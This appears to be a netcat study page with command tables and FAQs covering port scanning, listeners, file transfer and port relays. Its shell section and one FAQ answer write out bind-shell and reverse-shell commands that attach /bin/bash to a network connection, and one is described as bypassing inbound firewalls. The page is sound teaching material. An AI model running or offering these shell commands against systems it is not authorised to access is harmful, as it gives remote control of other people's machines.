Netcat Command Practice
netcat opens raw TCP or UDP sockets — as a client, server, or scanner — with a single command and no daemon required. This track drills the flags that turn nc into a port scanner (-z), a persistent listener (-k), a UDP probe (-u), or one half of a file-transfer pipeline.
Command Reference
scan
| Command | Description |
|---|---|
nc -zv <host> <start>-<end> | Scan a port range with verbose output — prints a line for each port indicating open or refused. |
nc -z <host> <start>-<end> | Scan a range of TCP ports on a host, reporting which ports are open (zero I/O mode — no data sent). |
nc -zvn <host> <start>-<end> | Scan a port range without DNS resolution — faster scan using raw IP addresses. |
nc -zvn <host> <port1> <port2> <port3> | Probe a list of specific non-contiguous ports rather than a continuous range. |
nc -zvn -w <seconds> <host> <start>-<end> | Scan a port range with a per-connection timeout — prevents the scan from hanging on filtered ports. |
listen
| Command | Description |
|---|---|
nc -lv <port> | Start a verbose TCP listener — prints the connecting client's address when a connection is accepted. |
nc -l <port> | Start a one-shot TCP listener on the given port — closes after the first client disconnects. |
nc -kl <port> | Keep the listener open and accept new connections after each client disconnects — does not exit after the first session. |
nc -ul <port> | Start a UDP listener on the given port instead of the default TCP. |
nc -4 -l <port> | Restrict the listener to IPv4 only — prevents nc from binding on the IPv6 wildcard address. |
connect
| Command | Description |
|---|---|
nc -v <host> <port> | Connect to a host and print verbose connection status messages — confirms whether the connection succeeded or was refused. |
nc <host> <port> | Open a raw TCP connection to a host on the specified port. |
nc -n <host> <port> | Connect using a raw IP address without performing DNS resolution. |
nc -w <seconds> <host> <port> | Connect to a host and close the connection if no data is exchanged within the given timeout in seconds. |
nc -u <host> <port> | Send data over UDP instead of TCP — useful for testing UDP services or sending syslog messages. |
shell
| Command | Description |
|---|---|
nc <host> <port> | Connect to a netcat chat server — stdin goes to the remote party and the remote party's output appears on stdout. |
nc -lv <port> | Start a simple raw TCP chat server — anything typed by either party is sent to the other over the connection. |
echo "" | nc -zv -w <seconds> <host> <port> | Send an empty string to a port to trigger a banner response from the service, using zero-I/O mode with a timeout. |
nc -lv <port> -e /bin/bash | Bind a bash shell to a port so any connecting client gets an interactive shell — requires GNU nc or ncat (OpenBSD nc dropped -e). |
nc <host> <port> -e /bin/bash | Connect back to a listener and hand off a local bash shell — bypasses inbound firewall rules on the target. Requires GNU nc or ncat. |
transfer
| Command | Description |
|---|---|
nc <host> <port> < <file> | Send a local file to a listening nc server by redirecting the file into stdin. |
nc -lv <port> > <file> | Listen for an incoming connection and write everything received into a local file. |
nc -nv <host> <port> > <file> | Connect to a listening nc server and write everything received to a local file. |
nc -lv <port> < <file> | Serve a file from a listener — any client that connects receives the file's contents on stdout. |
tar -cvf - <dir> | nc -l <port> | Archive a directory and stream it over the network — the client receives and extracts with nc piped into tar. |
nc -n <host> <port> | tar -xvf - | Connect to a server streaming a tar archive and extract the directory contents on the fly. |
proxy
| Command | Description |
|---|---|
nc -6 -l <port> | Start a listener bound to IPv6 only — useful when probing IPv6-only or dual-stack services. |
nc -l <port1> | nc <host> <port2> | Create a one-way port relay: incoming connections on port1 have their data forwarded to host:port2. |
nc -lp <port1> -c "nc <host> <port2>" | Use -c to spawn a second nc as a subprocess, creating a bidirectional port relay (requires GNU nc or ncat). |
mkfifo /tmp/pipe && nc -l <port1> < /tmp/pipe | nc <host> <port2> > /tmp/pipe | Create a bidirectional TCP relay using a named FIFO so data flows in both directions between two nc instances. |
Key Use Cases
- Check which ports are open on a host by scanning a range with -z
- Stand up a one-shot TCP listener to receive a file piped from another machine
- Send a raw HTTP request to a web server to grab its banner
- Forward traffic from one local port to another using a pipe between two nc processes
- Test UDP reachability on a service port without a dedicated UDP client
- Keep a listener alive across repeated connections with -k for repeated testing
Frequently Asked Questions
What is the difference between nc -l and nc -lp?
In OpenBSD netcat, -l puts nc into listen mode and the port can be given as the final positional argument (nc -l 8080) or via -p (nc -lp 8080). Both forms are equivalent; -lp is the traditional style seen in older scripts.
What does -z do in netcat?
-z (zero I/O) puts nc into port-scan mode: it attempts to connect to each port in the range and reports success or failure without sending any data. Combine with -v for verbose output and -n to skip DNS.
Why use -n with netcat port scans?
-n disables DNS resolution, so nc uses raw IP addresses instead of performing a hostname lookup for each connection attempt. This dramatically speeds up range scans (e.g., nc -zvn 192.168.1.1 1-1024).
What is the difference between a forward shell and a reverse shell with netcat?
In a forward shell, the server listens (nc -l 8000 -e /bin/bash) and the client connects to get a shell. In a reverse shell, the client connects back to the attacker's listener (nc <host> 8000 -e /bin/bash), bypassing inbound firewall rules. Note: -e requires GNU nc or ncat; OpenBSD nc dropped it.
Ready to master Netcat commands?
Test your muscle memory with our spaced-repetition quiz system. Free forever.
